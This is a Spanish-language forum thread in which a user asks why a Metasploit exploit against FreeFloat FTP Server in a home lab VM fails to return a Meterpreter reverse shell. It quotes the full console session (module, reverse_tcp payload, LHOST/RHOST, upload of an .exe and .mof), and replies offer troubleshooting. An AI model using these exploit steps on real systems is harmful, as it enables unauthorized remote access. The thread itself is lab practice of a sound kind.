Exploit FreeFloat

Iniciado por RxB, Octubre 10, 2015, 09:51:13 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Octubre 10, 2015, 09:51:13 PM Ultima modificación: Octubre 10, 2015, 09:59:40 PM por Gabriela
Hola Gente,

Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?



msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit
  • Exploit running as background job.

  • Started reverse handler on 192.168.1.102:4444
    msf exploit(freefloatftp_wbem) >
  • Server started.
  • 192.168.1.106:21 - Trying to upload SxofqwKjdO.exe
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
  • 192.168.1.106:21 - Trying to upload pvzBH.mof
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"

    msf exploit(freefloatftp_wbem) >
Octubre 23, 2015, 09:19:55 AM #1
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,

Sabes si hay un firewall en el medio? O si el puerto está efectivamente abierto?

Saludos!
ANTRAX

Octubre 23, 2015, 11:30:40 AM #2
El puerto está abierto con firewall desactivado.
Octubre 23, 2015, 11:39:56 AM #3
Comparaste la versión de FreeFloat con la del expoit?

Saludos!
ANTRAX

Octubre 23, 2015, 12:26:45 PM #4
Si, la versión es exactamente la misma q aparece en los targets del exploit.
Octubre 23, 2015, 02:38:49 PM #5
Te aseguraste de que FreeFloat FTP Server este en el modo "Start"?
Es decir, para que este exploit funcione, necesita que el programa esté corriendo, y ahi se sube el  NFSIf.exe y kQfzssDlqDGZO.mof en el sistema del usuario, devolviendo una sesion meterpreter. si es que se logra una conexión exitosa

Saludos!
ANTRAX

Octubre 23, 2015, 02:55:30 PM #6
Si, estaba en modo start corriendo en el puerto 21. Comienza a subir el archivo SxofqwKjdO.exe, se autentica en forma correcta y queda colgado. La prueba la realicé sobre una máquina virtual. Tal vez tenga q ver con algún error de config en la máquina virtual
Octubre 23, 2015, 03:08:23 PM #7
Puede ser, no tienes otra pc para probarlo? asi vas descartando problemas. Por que los pasos que describiste que hiciste, estan todos bien.

Saludos!
ANTRAX

Imprimir
Ir Arriba Páginas1
Acciones del Usuario